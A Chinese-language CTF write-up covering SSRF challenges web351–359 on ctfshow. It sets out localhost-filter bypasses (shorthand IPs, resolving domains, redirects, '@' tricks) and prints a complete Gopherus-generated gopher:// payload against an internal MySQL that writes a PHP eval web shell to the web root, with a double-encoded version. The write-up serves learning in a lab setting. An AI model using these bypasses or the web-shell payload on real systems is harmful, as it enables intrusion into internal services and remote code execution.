SSRF服务端请求Gopher伪协议白盒测试

news2025/1/5 6:31:43

前言

是什么SSRF？这个简单点说就是服务端的请求伪造就是这个如果是个请求图片的网站他的目的是请求外部其他网站的图片但是 SSRF指的是让他请求本地的图片再展示出来请求的是他的服务器上的图片

SSRF(Server-Side Request Forgery:服务器端请求伪造)

一种由攻击者构造形成由服务端发起请求的一个安全漏洞;

一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。

（正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统）

SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。

SSRF服务端请求的伪造演示

简单的演示：最简单就是这个是远程请求的网站可以让你加载其他的资源

目的：

请求远程的图片（为什么乱码就是因为我的代码没有设置解析图片的东西）

构造payload

加载了我本地的站点

加载了我的数据库的内容

当然如果是 http://127.0.0.1//d:/1.txt 是不是可以直接读取本地的文件了

玩法和产生：产生就是一些网站的功能（文件的下载转发分享）导致的
有回显的玩法
1、内网的探针
2、伪协议实现文件的读取等操作 file

看一下源码

白盒测试

以ctfshow的题为主

web351

这个从 curl 这个函数就可以审计出是有 ssrf 的

因为没有做过滤我们直接使用hackerbar

直接请求或者如果你知道他的绝对路径可以使用其他的协议 file://

web352

审计：

web353

使用域名解析代替 127.0.0.1

域名解析代替127网站获取flag：http://safe.taobao.com/flag.php

url=http://spoofed.burpcollaborator.net/flag.php

http://sudo.cc/flag.php

http://www.ruiaxx.cn/flag.php

web354

这个时候的过滤方式我们想到了几种：

1、进制转换（0 1 过滤二进制应该鸡鸡了）

2、省略绕过（这里不行（把127.0.0.1 搞为 127.1 0 [::] 这些都是可以的））

3、短网址绕过

4、重定向绕过（这个就是属于远程访问了）

5、域名解析（这个多用于搞长度限制的那些题目）

演示进制转换

但是发现都有 01 全部淘汰

再一个就是短网址绕过

短网址不要试了有 0的

所以直接使用域名解析绕过

这边直接阿里云搞一波还是域名解析得到flag

可以自己搭建当然还可以使用重定向

web355

http://0/flag.php 这个方式绕过或者是 127.1 这样这个就是缩写绕过

web356

别以为略写无敌了这个是需要linux服务器（linux服务器的特点解析）的

web357

、

查了一下这个是域名解析函数那这个的逻辑就变成了当我们的http输入后边的不是域名或者ip的时候才能进行输出

这个只有30x重定向符合

不信先搞个普通的

再使用上面的域名

重定向不是所有的时候都可以使用的这个只能用于别人访问你当下的域名进行解析的时候这个gethostbyname 就能符号所以直接成功

web358

url=http://ctf.@127.0.0.1/flag.php # *show

@ 是专指的是当前的要访问的地址

# 用作过滤

WEB 359

看一下题目无密码的mysql 这个是个特点没有这个还不可以

这个考的是我们sql注入内网的时候的场景因为http无法访问内网从而导致我们的探针失败（因为他的数据库不是外网所以我们不能直接注入操作）

但是这个时候就需要新的协议

gopher:// 分布式文档传递服务，可使用gopherus生成payload

由于有部分协议http这类不支持，可以gopher来进行通讯（mysql，redis等）

应用：漏洞利用或信息收集通讯相关服务的时候工具：Gopherus\

简单的说就是你当前的这个api是个接口内网在里面我们重定向让内网出来访问是不可能的但是我们使用http又进不去这个 gopher协议就可以帮助构造payload 从而执行

工具的用法： py --exploit 数据库

然后输入你想输入的语法就可以了

然后输入你要加密的 select <?php eval($_POST[cmd])?> into outfile '/var/www/html/cmd.php'

因为我这个是没有 python 2环境的所以我直接使用别人解析好的了

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4a%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%63%6d%64%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%63%6d%64%2e%70%68%70%27%3b%01%00%00%00%01

复制上直接拿下这个不对的因为有 %出现所以服务器会进行url 解码一次所以我们的逻辑就是把这个加密一次

%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%254a%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2527%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2563%256d%2564%255d%2529%253b%253f%253e%2527%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2563%256d%2564%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501

复制加上前缀